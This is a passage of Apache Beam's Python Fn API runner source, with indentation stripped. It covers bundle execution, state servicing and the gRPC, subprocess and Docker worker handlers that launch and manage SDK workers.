pipeline_components.pcollections[output_pcoll].
windowing_strategy_id]
pcoll_buffers[buffer_id] = _GroupingBuffer(
pre_gbk_coder, post_gbk_coder, windowing_strategy)
else:
# These should be the only two identifiers we produce for now,
# but special side input writes may go here.
raise NotImplementedError(buffer_id)
return pcoll_buffers[buffer_id]
def get_input_coder_impl(transform_id):
return context.coders[
safe_coders[beam_fn_api_pb2.RemoteGrpcPort.FromString(
process_bundle_descriptor.transforms[transform_id].spec.payload).
coder_id]].get_impl()
# Change cache token across bundle repeats
cache_token_generator = FnApiRunner.get_cache_token_generator(static=False)
self._run_bundle_multiple_times_for_testing(
worker_handler_list,
process_bundle_descriptor,
data_input,
data_output,
get_input_coder_impl,
cache_token_generator=cache_token_generator)
bundle_manager = ParallelBundleManager(
worker_handler_list,
get_buffer,
get_input_coder_impl,
process_bundle_descriptor,
self._progress_frequency,
num_workers=self._num_workers,
cache_token_generator=cache_token_generator)
result, splits = bundle_manager.process_bundle(data_input, data_output)
def input_for(transform_id, input_id):
# type: (str, str) -> str
input_pcoll = process_bundle_descriptor.transforms[transform_id].inputs[
input_id]
for read_id, proto in process_bundle_descriptor.transforms.items():
if (proto.spec.urn == bundle_processor.DATA_INPUT_URN and
input_pcoll in proto.outputs.values()):
return read_id
raise RuntimeError('No IO transform feeds %s' % transform_id)
last_result = result
last_sent = data_input
while True:
deferred_inputs = collections.defaultdict(
_ListBuffer) # type: DefaultDict[str, PartitionableBuffer]
self._collect_written_timers_and_add_to_deferred_inputs(
context, pipeline_components, stage, get_buffer, deferred_inputs)
# Queue any process-initiated delayed bundle applications.
for delayed_application in last_result.process_bundle.residual_roots:
deferred_inputs[input_for(
delayed_application.application.transform_id,
delayed_application.application.input_id)].append(
delayed_application.application.element)
# Queue any runner-initiated delayed bundle applications.
self._add_residuals_and_channel_splits_to_deferred_inputs(
splits, get_input_coder_impl, input_for, last_sent, deferred_inputs)
if deferred_inputs:
# The worker will be waiting on these inputs as well.
for other_input in data_input:
if other_input not in deferred_inputs:
deferred_inputs[other_input] = _ListBuffer([])
# TODO(robertwb): merge results
# We cannot split deferred_input until we include residual_roots to
# merged results. Without residual_roots, pipeline stops earlier and we
# may miss some data.
bundle_manager._num_workers = 1
# TODO(BEAM-8486): this should be changed to _registered
bundle_manager._skip_registration = True # type: ignore[attr-defined]
last_result, splits = bundle_manager.process_bundle(
deferred_inputs, data_output)
last_sent = deferred_inputs
result = beam_fn_api_pb2.InstructionResponse(
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
monitoring_infos=monitoring_infos.consolidate(
itertools.chain(
result.process_bundle.monitoring_infos,
last_result.process_bundle.monitoring_infos))),
error=result.error or last_result.error)
else:
break
return result
@staticmethod
def _extract_endpoints(stage, # type: fn_api_runner_transforms.Stage
pipeline_components, # type: beam_runner_api_pb2.Components
data_api_service_descriptor, # type: Optional[endpoints_pb2.ApiServiceDescriptor]
pcoll_buffers # type: DefaultDict[bytes, PartitionableBuffer]
):
# type: (...) -> Tuple[Dict[str, PartitionableBuffer], DataSideInput, DataOutput]
"""Returns maps of transform names to PCollection identifiers.
Also mutates IO stages to point to the data ApiServiceDescriptor.
Args:
stage (fn_api_runner_transforms.Stage): The stage to extract endpoints
for.
pipeline_components (beam_runner_api_pb2.Components): Components of the
pipeline to include coders, transforms, PCollections, etc.
data_api_service_descriptor: A GRPC endpoint descriptor for data plane.
pcoll_buffers (dict): A dictionary containing buffers for PCollection
elements.
Returns:
A tuple of (data_input, data_side_input, data_output) dictionaries.
`data_input` is a dictionary mapping (transform_name, output_name) to a
PCollection buffer; `data_output` is a dictionary mapping
(transform_name, output_name) to a PCollection ID.
"""
data_input = {} # type: Dict[str, PartitionableBuffer]
data_side_input = {} # type: DataSideInput
data_output = {} # type: DataOutput
for transform in stage.transforms:
if transform.spec.urn in (bundle_processor.DATA_INPUT_URN,
bundle_processor.DATA_OUTPUT_URN):
pcoll_id = transform.spec.payload
if transform.spec.urn == bundle_processor.DATA_INPUT_URN:
if pcoll_id == fn_api_runner_transforms.IMPULSE_BUFFER:
data_input[transform.unique_name] = _ListBuffer(
[ENCODED_IMPULSE_VALUE])
else:
data_input[transform.unique_name] = pcoll_buffers[pcoll_id]
coder_id = pipeline_components.pcollections[only_element(
transform.outputs.values())].coder_id
elif transform.spec.urn == bundle_processor.DATA_OUTPUT_URN:
data_output[transform.unique_name] = pcoll_id
coder_id = pipeline_components.pcollections[only_element(
transform.inputs.values())].coder_id
else:
raise NotImplementedError
data_spec = beam_fn_api_pb2.RemoteGrpcPort(coder_id=coder_id)
if data_api_service_descriptor:
data_spec.api_service_descriptor.url = (
data_api_service_descriptor.url)
transform.spec.payload = data_spec.SerializeToString()
elif transform.spec.urn in fn_api_runner_transforms.PAR_DO_URNS:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
for tag, si in payload.side_inputs.items():
data_side_input[transform.unique_name, tag] = (
create_buffer_id(transform.inputs[tag]), si.access_pattern)
return data_input, data_side_input, data_output
# These classes are used to interact with the worker.
class StateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer,
sdk_worker.StateHandler):
class CopyOnWriteState(object):
def __init__(self, underlying):
# type: (DefaultDict[bytes, Buffer]) -> None
self._underlying = underlying
self._overlay = {} # type: Dict[bytes, Buffer]
def __getitem__(self, key):
# type: (bytes) -> Buffer
if key in self._overlay:
return self._overlay[key]
else:
return FnApiRunner.StateServicer.CopyOnWriteList(
self._underlying, self._overlay, key)
def __delitem__(self, key):
# type: (bytes) -> None
self._overlay[key] = []
def commit(self):
# type: () -> DefaultDict[bytes, Buffer]
self._underlying.update(self._overlay)
return self._underlying
class CopyOnWriteList(object):
def __init__(self,
underlying, # type: DefaultDict[bytes, Buffer]
overlay, # type: Dict[bytes, Buffer]
key # type: bytes
):
# type: (...) -> None
self._underlying = underlying
self._overlay = overlay
self._key = key
def __iter__(self):
# type: () -> Iterator[bytes]
if self._key in self._overlay:
return iter(self._overlay[self._key])
else:
return iter(self._underlying[self._key])
def append(self, item):
# type: (bytes) -> None
if self._key not in self._overlay:
self._overlay[self._key] = list(self._underlying[self._key])
self._overlay[self._key].append(item)
StateType = Union[CopyOnWriteState, DefaultDict[bytes, Buffer]]
def __init__(self):
# type: () -> None
self._lock = threading.Lock()
self._state = collections.defaultdict(
list) # type: FnApiRunner.StateServicer.StateType
self._checkpoint = None # type: Optional[FnApiRunner.StateServicer.StateType]
self._use_continuation_tokens = False
self._continuations = {} # type: Dict[bytes, Tuple[bytes, ...]]
def checkpoint(self):
# type: () -> None
assert self._checkpoint is None and not \
isinstance(self._state, FnApiRunner.StateServicer.CopyOnWriteState)
self._checkpoint = self._state
self._state = FnApiRunner.StateServicer.CopyOnWriteState(self._state)
def commit(self):
# type: () -> None
assert isinstance(self._state,
FnApiRunner.StateServicer.CopyOnWriteState) and \
isinstance(self._checkpoint,
FnApiRunner.StateServicer.CopyOnWriteState)
self._state.commit()
self._state = self._checkpoint.commit()
self._checkpoint = None
def restore(self):
# type: () -> None
assert self._checkpoint is not None
self._state = self._checkpoint
self._checkpoint = None
@contextlib.contextmanager
def process_instruction_id(self, unused_instruction_id):
yield
def get_raw(self,
state_key, # type: beam_fn_api_pb2.StateKey
continuation_token=None # type: Optional[bytes]
):
# type: (...) -> Tuple[bytes, Optional[bytes]]
with self._lock:
full_state = self._state[self._to_key(state_key)]
if self._use_continuation_tokens:
# The token is "nonce:index".
if not continuation_token:
token_base = b'token_%x' % len(self._continuations)
self._continuations[token_base] = tuple(full_state)
return b'', b'%s:0' % token_base
else:
token_base, index = continuation_token.split(b':')
ix = int(index)
full_state_cont = self._continuations[token_base]
if ix == len(full_state_cont):
return b'', None
else:
return full_state_cont[ix], b'%s:%d' % (token_base, ix + 1)
else:
assert not continuation_token
return b''.join(full_state), None
def append_raw(
self,
state_key, # type: beam_fn_api_pb2.StateKey
data # type: bytes
):
# type: (...) -> _Future
with self._lock:
self._state[self._to_key(state_key)].append(data)
return _Future.done()
def clear(self, state_key):
# type: (beam_fn_api_pb2.StateKey) -> _Future
with self._lock:
try:
del self._state[self._to_key(state_key)]
except KeyError:
# This may happen with the caching layer across bundles. Caching may
# skip this storage layer for a blocking_get(key) request. Without
# the caching, the state for a key would be initialized via the
# defaultdict that _state uses.
pass
return _Future.done()
@staticmethod
def _to_key(state_key):
# type: (beam_fn_api_pb2.StateKey) -> bytes
return state_key.SerializeToString()
class GrpcStateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer):
def __init__(self, state):
# type: (FnApiRunner.StateServicer) -> None
self._state = state
def State(self,
request_stream, # type: Iterable[beam_fn_api_pb2.StateRequest]
context=None
):
# type: (...) -> Iterator[beam_fn_api_pb2.StateResponse]
# Note that this eagerly mutates state, assuming any failures are fatal.
# Thus it is safe to ignore instruction_id.
for request in request_stream:
request_type = request.WhichOneof('request')
if request_type == 'get':
data, continuation_token = self._state.get_raw(
request.state_key, request.get.continuation_token)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
get=beam_fn_api_pb2.StateGetResponse(
data=data, continuation_token=continuation_token))
elif request_type == 'append':
self._state.append_raw(request.state_key, request.append.data)
yield beam_fn_api_pb2.StateResponse(
id=request.id, append=beam_fn_api_pb2.StateAppendResponse())
elif request_type == 'clear':
self._state.clear(request.state_key)
yield beam_fn_api_pb2.StateResponse(
id=request.id, clear=beam_fn_api_pb2.StateClearResponse())
else:
raise NotImplementedError('Unknown state request: %s' % request_type)
class SingletonStateHandlerFactory(sdk_worker.StateHandlerFactory):
"""A singleton cache for a StateServicer."""
def __init__(self, state_handler):
# type: (sdk_worker.CachingStateHandler) -> None
self._state_handler = state_handler
def create_state_handler(self, api_service_descriptor):
# type: (endpoints_pb2.ApiServiceDescriptor) -> sdk_worker.CachingStateHandler
"""Returns the singleton state handler."""
return self._state_handler
def close(self):
# type: () -> None
"""Does nothing."""
pass
@staticmethod
def get_cache_token_generator(static=True):
"""A generator for cache tokens.
:arg static If True, generator always returns the same cache token
If False, generator returns a new cache token each time
:return A generator which returns a cache token on next(generator)
"""
def generate_token(identifier):
return beam_fn_api_pb2.ProcessBundleRequest.CacheToken(
user_state=beam_fn_api_pb2.ProcessBundleRequest.CacheToken.UserState(
),
token="cache_token_{}".format(identifier).encode("utf-8"))
class StaticGenerator(object):
def __init__(self):
self._token = generate_token(1)
def __iter__(self):
# pylint: disable=non-iterator-returned
return self
def __next__(self):
return self._token
class DynamicGenerator(object):
def __init__(self):
self._counter = 0
self._lock = threading.Lock()
def __iter__(self):
# pylint: disable=non-iterator-returned
return self
def __next__(self):
with self._lock:
self._counter += 1
return generate_token(self._counter)
return StaticGenerator() if static else DynamicGenerator()
class WorkerHandler(object):
"""worker_handler for a worker.
It provides utilities to start / stop the worker, provision any resources for
it, as well as provide descriptors for the data, state and logging APIs for
it.
"""
_registered_environments = {} # type: Dict[str, Tuple[ConstructorFn, type]]
_worker_id_counter = -1
_lock = threading.Lock()
control_conn = None # type: ControlConnection
data_conn = None # type: data_plane._GrpcDataChannel
def __init__(self,
control_handler,
data_plane_handler,
state, # type: FnApiRunner.StateServicer
provision_info # type: Optional[ExtendedProvisionInfo]
):
# type: (...) -> None
"""Initialize a WorkerHandler.
Args:
control_handler:
data_plane_handler (data_plane.DataChannel):
state:
provision_info:
"""
self.control_handler = control_handler
self.data_plane_handler = data_plane_handler
self.state = state
self.provision_info = provision_info
with WorkerHandler._lock:
WorkerHandler._worker_id_counter += 1
self.worker_id = 'worker_%s' % WorkerHandler._worker_id_counter
def close(self):
# type: () -> None
self.stop_worker()
def start_worker(self):
# type: () -> None
raise NotImplementedError
def stop_worker(self):
# type: () -> None
raise NotImplementedError
def data_api_service_descriptor(self):
# type: () -> Optional[endpoints_pb2.ApiServiceDescriptor]
raise NotImplementedError
def state_api_service_descriptor(self):
# type: () -> Optional[endpoints_pb2.ApiServiceDescriptor]
raise NotImplementedError
def logging_api_service_descriptor(self):
# type: () -> Optional[endpoints_pb2.ApiServiceDescriptor]
raise NotImplementedError
@classmethod
def register_environment(
cls,
urn, # type: str
payload_type # type: Optional[Type[T]]
):
# type: (...) -> Callable[[Callable[[T, FnApiRunner.StateServicer, Optional[ExtendedProvisionInfo], GrpcServer], WorkerHandler]], Callable[[T, FnApiRunner.StateServicer, Optional[ExtendedProvisionInfo], GrpcServer], WorkerHandler]]
def wrapper(constructor):
cls._registered_environments[urn] = constructor, payload_type
return constructor
return wrapper
@classmethod
def create(cls,
environment, # type: beam_runner_api_pb2.Environment
state, # type: FnApiRunner.StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
grpc_server # type: GrpcServer
):
# type: (...) -> WorkerHandler
constructor, payload_type = cls._registered_environments[environment.urn]
return constructor(
proto_utils.parse_Bytes(environment.payload, payload_type),
state,
provision_info,
grpc_server)
@WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON, None)
class EmbeddedWorkerHandler(WorkerHandler):
"""An in-memory worker_handler for fn API control, state and data planes."""
def __init__(self,
unused_payload, # type: None
state, # type: sdk_worker.StateHandler
provision_info, # type: Optional[ExtendedProvisionInfo]
unused_grpc_server=None
):
# type: (...) -> None
super(EmbeddedWorkerHandler, self).__init__(
self, data_plane.InMemoryDataChannel(), state, provision_info)
self.control_conn = self # type: ignore # need Protocol to describe this
self.data_conn = self.data_plane_handler
state_cache = StateCache(STATE_CACHE_SIZE)
self.bundle_processor_cache = sdk_worker.BundleProcessorCache(
FnApiRunner.SingletonStateHandlerFactory(
sdk_worker.CachingStateHandler(state_cache, state)),
data_plane.InMemoryDataChannelFactory(
self.data_plane_handler.inverse()), {})
self.worker = sdk_worker.SdkWorker(
self.bundle_processor_cache,
state_cache_metrics_fn=state_cache.get_monitoring_infos)
self._uid_counter = 0
def push(self, request):
if not request.instruction_id:
self._uid_counter += 1
request.instruction_id = 'control_%s' % self._uid_counter
response = self.worker.do_instruction(request)
return ControlFuture(request.instruction_id, response)
def start_worker(self):
# type: () -> None
pass
def stop_worker(self):
# type: () -> None
self.bundle_processor_cache.shutdown()
def done(self):
# type: () -> None
pass
def data_api_service_descriptor(self):
# type: () -> None
return None
def state_api_service_descriptor(self):
# type: () -> None
return None
def logging_api_service_descriptor(self):
# type: () -> None
return None
class BasicLoggingService(beam_fn_api_pb2_grpc.BeamFnLoggingServicer):
LOG_LEVEL_MAP = {
beam_fn_api_pb2.LogEntry.Severity.CRITICAL: logging.CRITICAL,
beam_fn_api_pb2.LogEntry.Severity.ERROR: logging.ERROR,
beam_fn_api_pb2.LogEntry.Severity.WARN: logging.WARNING,
beam_fn_api_pb2.LogEntry.Severity.NOTICE: logging.INFO + 1,
beam_fn_api_pb2.LogEntry.Severity.INFO: logging.INFO,
beam_fn_api_pb2.LogEntry.Severity.DEBUG: logging.DEBUG,
beam_fn_api_pb2.LogEntry.Severity.TRACE: logging.DEBUG - 1,
beam_fn_api_pb2.LogEntry.Severity.UNSPECIFIED: logging.NOTSET,
}
def Logging(self, log_messages, context=None):
yield beam_fn_api_pb2.LogControl()
for log_message in log_messages:
for log in log_message.log_entries:
logging.log(self.LOG_LEVEL_MAP[log.severity], str(log))
class BasicProvisionService(beam_provision_api_pb2_grpc.ProvisionServiceServicer
):
def __init__(self, info):
# type: (Optional[beam_provision_api_pb2.ProvisionInfo]) -> None
self._info = info
def GetProvisionInfo(self, request, context=None):
# type: (...) -> beam_provision_api_pb2.GetProvisionInfoResponse
return beam_provision_api_pb2.GetProvisionInfoResponse(info=self._info)
class EmptyArtifactRetrievalService(
beam_artifact_api_pb2_grpc.ArtifactRetrievalServiceServicer):
def GetManifest(self, request, context=None):
return beam_artifact_api_pb2.GetManifestResponse(
manifest=beam_artifact_api_pb2.Manifest())
def GetArtifact(self, request, context=None):
raise ValueError('No artifacts staged.')
class GrpcServer(object):
_DEFAULT_SHUTDOWN_TIMEOUT_SECS = 5
def __init__(self,
state, # type: FnApiRunner.StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
):
# type: (...) -> None
self.state = state
self.provision_info = provision_info
self.control_server = grpc.server(UnboundedThreadPoolExecutor())
self.control_port = self.control_server.add_insecure_port('[::]:0')
self.control_address = 'localhost:%s' % self.control_port
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size
# is controlled in a layer above.
no_max_message_sizes = [("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)]
self.data_server = grpc.server(
UnboundedThreadPoolExecutor(), options=no_max_message_sizes)
self.data_port = self.data_server.add_insecure_port('[::]:0')
self.state_server = grpc.server(
UnboundedThreadPoolExecutor(), options=no_max_message_sizes)
self.state_port = self.state_server.add_insecure_port('[::]:0')
self.control_handler = BeamFnControlServicer()
beam_fn_api_pb2_grpc.add_BeamFnControlServicer_to_server(
self.control_handler, self.control_server)
# If we have provision info, serve these off the control port as well.
if self.provision_info:
if self.provision_info.provision_info:
beam_provision_api_pb2_grpc.add_ProvisionServiceServicer_to_server(
BasicProvisionService(self.provision_info.provision_info),
self.control_server)
if self.provision_info.artifact_staging_dir:
service = artifact_service.BeamFilesystemArtifactService(
self.provision_info.artifact_staging_dir
) # type: beam_artifact_api_pb2_grpc.ArtifactRetrievalServiceServicer
else:
service = EmptyArtifactRetrievalService()
beam_artifact_api_pb2_grpc.add_ArtifactRetrievalServiceServicer_to_server(
service, self.control_server)
self.data_plane_handler = data_plane.BeamFnDataServicer(
DATA_BUFFER_TIME_LIMIT_MS)
beam_fn_api_pb2_grpc.add_BeamFnDataServicer_to_server(
self.data_plane_handler, self.data_server)
beam_fn_api_pb2_grpc.add_BeamFnStateServicer_to_server(
FnApiRunner.GrpcStateServicer(state), self.state_server)
self.logging_server = grpc.server(
UnboundedThreadPoolExecutor(), options=no_max_message_sizes)
self.logging_port = self.logging_server.add_insecure_port('[::]:0')
beam_fn_api_pb2_grpc.add_BeamFnLoggingServicer_to_server(
BasicLoggingService(), self.logging_server)
_LOGGER.info('starting control server on port %s', self.control_port)
_LOGGER.info('starting data server on port %s', self.data_port)
_LOGGER.info('starting state server on port %s', self.state_port)
_LOGGER.info('starting logging server on port %s', self.logging_port)
self.logging_server.start()
self.state_server.start()
self.data_server.start()
self.control_server.start()
def close(self):
self.control_handler.done()
to_wait = [
self.control_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.data_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.state_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.logging_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS)
]
for w in to_wait:
w.wait()
class GrpcWorkerHandler(WorkerHandler):
"""An grpc based worker_handler for fn API control, state and data planes."""
def __init__(self,
state, # type: FnApiRunner.StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
grpc_server # type: GrpcServer
):
# type: (...) -> None
self._grpc_server = grpc_server
super(GrpcWorkerHandler, self).__init__(
self._grpc_server.control_handler,
self._grpc_server.data_plane_handler,
state,
provision_info)
self.state = state
self.control_address = self.port_from_worker(self._grpc_server.control_port)
self.control_conn = self._grpc_server.control_handler.get_conn_by_worker_id(
self.worker_id)
self.data_conn = self._grpc_server.data_plane_handler.get_conn_by_worker_id(
self.worker_id)
def data_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.data_port))
def state_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.state_port))
def logging_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.logging_port))
def close(self):
self.control_conn.close()
self.data_conn.close()
super(GrpcWorkerHandler, self).close()
def port_from_worker(self, port):
return '%s:%s' % (self.host_from_worker(), port)
def host_from_worker(self):
return 'localhost'
@WorkerHandler.register_environment(
common_urns.environments.EXTERNAL.urn, beam_runner_api_pb2.ExternalPayload)
class ExternalWorkerHandler(GrpcWorkerHandler):
def __init__(self,
external_payload, # type: beam_runner_api_pb2.ExternalPayload
state, # type: FnApiRunner.StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
grpc_server # type: GrpcServer
):
# type: (...) -> None
super(ExternalWorkerHandler,
self).__init__(state, provision_info, grpc_server)
self._external_payload = external_payload
def start_worker(self):
# type: () -> None
stub = beam_fn_api_pb2_grpc.BeamFnExternalWorkerPoolStub(
GRPCChannelFactory.insecure_channel(
self._external_payload.endpoint.url))
control_descriptor = endpoints_pb2.ApiServiceDescriptor(
url=self.control_address)
response = stub.StartWorker(
beam_fn_api_pb2.StartWorkerRequest(
worker_id=self.worker_id,
control_endpoint=control_descriptor,
artifact_endpoint=control_descriptor,
provision_endpoint=control_descriptor,
logging_endpoint=self.logging_api_service_descriptor(),
params=self._external_payload.params))
if response.error:
raise RuntimeError("Error starting worker: %s" % response.error)
def stop_worker(self):
# type: () -> None
pass
def host_from_worker(self):
# TODO(BEAM-8646): Reconcile the behavior on Windows platform.
if sys.platform == 'win32':
return 'localhost'
import socket
return socket.getfqdn()
@WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON_GRPC, bytes)
class EmbeddedGrpcWorkerHandler(GrpcWorkerHandler):
def __init__(self,
payload, # type: bytes
state, # type: FnApiRunner.StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
grpc_server # type: GrpcServer
):
# type: (...) -> None
super(EmbeddedGrpcWorkerHandler,
self).__init__(state, provision_info, grpc_server)
from apache_beam.transforms.environments import EmbeddedPythonGrpcEnvironment
config = EmbeddedPythonGrpcEnvironment.parse_config(payload.decode('utf-8'))
self._state_cache_size = config.get('state_cache_size') or STATE_CACHE_SIZE
self._data_buffer_time_limit_ms = \
config.get('data_buffer_time_limit_ms') or DATA_BUFFER_TIME_LIMIT_MS
def start_worker(self):
# type: () -> None
self.worker = sdk_worker.SdkHarness(
self.control_address,
state_cache_size=self._state_cache_size,
data_buffer_time_limit_ms=self._data_buffer_time_limit_ms,
worker_id=self.worker_id)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
self.worker_thread.daemon = True
self.worker_thread.start()
def stop_worker(self):
# type: () -> None
self.worker_thread.join()
# The subprocesses module is not threadsafe on Python 2.7. Use this lock to
# prevent concurrent calls to POpen().
SUBPROCESS_LOCK = threading.Lock()
@WorkerHandler.register_environment(python_urns.SUBPROCESS_SDK, bytes)
class SubprocessSdkWorkerHandler(GrpcWorkerHandler):
def __init__(self,
worker_command_line, # type: bytes
state, # type: FnApiRunner.StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
grpc_server # type: GrpcServer
):
# type: (...) -> None
super(SubprocessSdkWorkerHandler,
self).__init__(state, provision_info, grpc_server)
self._worker_command_line = worker_command_line
def start_worker(self):
# type: () -> None
from apache_beam.runners.portability import local_job_service
self.worker = local_job_service.SubprocessSdkWorker(
self._worker_command_line, self.control_address, self.worker_id)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
self.worker_thread.start()
def stop_worker(self):
# type: () -> None
self.worker_thread.join()
@WorkerHandler.register_environment(
common_urns.environments.DOCKER.urn, beam_runner_api_pb2.DockerPayload)
class DockerSdkWorkerHandler(GrpcWorkerHandler):
def __init__(self,
payload, # type: beam_runner_api_pb2.DockerPayload
state, # type: FnApiRunner.StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
grpc_server # type: GrpcServer
):
# type: (...) -> None
super(DockerSdkWorkerHandler,
self).__init__(state, provision_info, grpc_server)
self._container_image = payload.container_image
self._container_id = None # type: Optional[bytes]
def host_from_worker(self):
if sys.platform == "darwin":
# See https://docs.docker.com/docker-for-mac/networking/
return 'host.docker.internal'
else:
return super(DockerSdkWorkerHandler, self).host_from_worker()
def start_worker(self):
# type: () -> None
with SUBPROCESS_LOCK:
try:
subprocess.check_call(['docker', 'pull', self._container_image])
except Exception:
_LOGGER.info('Unable to pull image %s' % self._container_image)
self._container_id = subprocess.check_output([
'docker',
'run',
'-d',
# TODO: credentials
'--network=host',
self._container_image,
'--id=%s' % self.worker_id,
'--logging_endpoint=%s' % self.logging_api_service_descriptor().url,
'--control_endpoint=%s' % self.control_address,
'--artifact_endpoint=%s' % self.control_address,
'--provision_endpoint=%s' % self.control_address,
]).strip()
assert self._container_id is not None
while True:
status = subprocess.check_output([
'docker', 'inspect', '-f', '{{.State.Status}}', self._container_id
]).strip()
_LOGGER.info(
'Waiting for docker to start up.Current status is %s' % status)
if status == b'running':
_LOGGER.info(
'Docker container is running. container_id = %s, '
'worker_id = %s',
self._container_id,
self.worker_id)
break
elif status in (b'dead', b'exited'):
subprocess.call(['docker', 'container', 'logs', self._container_id])
raise RuntimeError('SDK failed to start. Final status is %s' % status)
time.sleep(1)
def stop_worker(self):
# type: () -> None
if self._container_id:
with SUBPROCESS_LOCK:
subprocess.call(['docker', 'kill', self._container_id])
class WorkerHandlerManager(object):
"""
Manages creation of ``WorkerHandler``s.
Caches ``WorkerHandler``s based on environment id.
"""
def __init__(self,
environments, # type: Mapping[str, beam_runner_api_pb2.Environment]
job_provision_info # type: Optional[ExtendedProvisionInfo]
):
# type: (...) -> None
self._environments = environments
self._job_provision_info = job_provision_info
self._cached_handlers = collections.defaultdict(
list) # type: DefaultDict[str, List[WorkerHandler]]
self._state = FnApiRunner.StateServicer() # rename?
self._grpc_server = None # type: Optional[GrpcServer]
def get_worker_handlers(
self,
environment_id, # type: Optional[str]
num_workers # type: int
):
# type: (...) -> List[WorkerHandler]
if environment_id is None:
# Any environment will do, pick one arbitrarily.
environment_id = next(iter(self._environments.keys()))
environment = self._environments[environment_id]
# assume all environments except EMBEDDED_PYTHON use gRPC.
if environment.urn == python_urns.EMBEDDED_PYTHON:
pass # no need for a gRPC server
elif self._grpc_server is None:
self._grpc_server = GrpcServer(self._state, self._job_provision_info)
worker_handler_list = self._cached_handlers[environment_id]
if len(worker_handler_list) < num_workers:
for _ in range(len(worker_handler_list), num_workers):
worker_handler = WorkerHandler.create(
environment,
self._state,
self._job_provision_info,
self._grpc_server)
_LOGGER.info(
"Created Worker handler %s for environment %s",
worker_handler,
environment)
self._cached_handlers[environment_id].append(worker_handler)
worker_handler.start_worker()
return self._cached_handlers[environment_id][:num_workers]
def close_all(self):
for worker_handler_list in self._cached_handlers.values():
for worker_handler in set(worker_handler_list):
try:
worker_handler.close()
except Exception:
_LOGGER.error(
"Error closing worker_handler %s" % worker_handler, exc_info=True)
self._cached_handlers = {}
if self._grpc_server is not None:
self._grpc_server.close()
self._grpc_server = None
class ExtendedProvisionInfo(object):
def __init__(self,
provision_info=None, # type: Optional[beam_provision_api_pb2.ProvisionInfo]
artifact_staging_dir=None,
job_name=None, # type: Optional[str]
):
self.provision_info = (
provision_info or beam_provision_api_pb2.ProvisionInfo())
self.artifact_staging_dir = artifact_staging_dir
self.job_name = job_name
_split_managers = []
@contextlib.contextmanager
def split_manager(stage_name, split_manager):
"""Registers a split manager to control the flow of elements to a given stage.
Used for testing.
A split manager should be a coroutine yielding desired split fractions,
receiving the corresponding split results. Currently, only one input is
supported.
"""
try:
_split_managers.append((stage_name, split_manager))
yield
finally:
_split_managers.pop()
class BundleManager(object):
"""Manages the execution of a bundle from the runner-side.
This class receives a bundle descriptor, and performs the following tasks:
- Registration of the bundle with the worker.
- Splitting of the bundle
- Setting up any other bundle requirements (e.g. side inputs).
- Submitting the bundle to worker for execution
- Passing bundle input data to the worker
- Collecting bundle output data from the worker
- Finalizing the bundle.
"""
_uid_counter = 0
_lock = threading.Lock()
def __init__(self,
worker_handler_list, # type: Sequence[WorkerHandler]
get_buffer, # type: Callable[[bytes], PartitionableBuffer]
get_input_coder_impl, # type: Callable[[str], CoderImpl]
bundle_descriptor, # type: beam_fn_api_pb2.ProcessBundleDescriptor
progress_frequency=None,
skip_registration=False,
cache_token_generator=FnApiRunner.get_cache_token_generator()
):
"""Set up a bundle manager.
Args:
worker_handler_list
get_buffer (Callable[[str], list])
get_input_coder_impl (Callable[[str], Coder])
bundle_descriptor (beam_fn_api_pb2.ProcessBundleDescriptor)
progress_frequency
skip_registration
"""
self._worker_handler_list = worker_handler_list
self._get_buffer = get_buffer
self._get_input_coder_impl = get_input_coder_impl
self._bundle_descriptor = bundle_descriptor
self._registered = skip_registration
self._progress_frequency = progress_frequency
self._worker_handler = None # type: Optional[WorkerHandler]
self._cache_token_generator = cache_token_generator
def _send_input_to_worker(self,
process_bundle_id, # type: str
read_transform_id, # type: str
byte_streams
):
assert self._worker_handler is not None
data_out = self._worker_handler.data_conn.output_stream(
process_bundle_id, read_transform_id)
for byte_stream in byte_streams:
data_out.write(byte_stream)
data_out.close()
def _register_bundle_descriptor(self):
# type: () -> Optional[ControlFuture]
if self._registered:
registration_future = None
else:
assert self._worker_handler is not None
process_bundle_registration = beam_fn_api_pb2.InstructionRequest(
register=beam_fn_api_pb2.RegisterRequest(
process_bundle_descriptor=[self._bundle_descriptor]))
registration_future = self._worker_handler.control_conn.push(
process_bundle_registration)
self._registered = True
return registration_future
def _select_split_manager(self):
"""TODO(pabloem) WHAT DOES THIS DO"""
unique_names = set(
t.unique_name for t in self._bundle_descriptor.transforms.values())
for stage_name, candidate in reversed(_split_managers):
if (stage_name in unique_names or
(stage_name + '/Process') in unique_names):
split_manager = candidate
break
else:
split_manager = None
return split_manager
def _generate_splits_for_testing(self,
split_manager,
inputs, # type: Mapping[str, PartitionableBuffer]
process_bundle_id):
# type: (...) -> List[beam_fn_api_pb2.ProcessBundleSplitResponse]
split_results = [] # type: List[beam_fn_api_pb2.ProcessBundleSplitResponse]
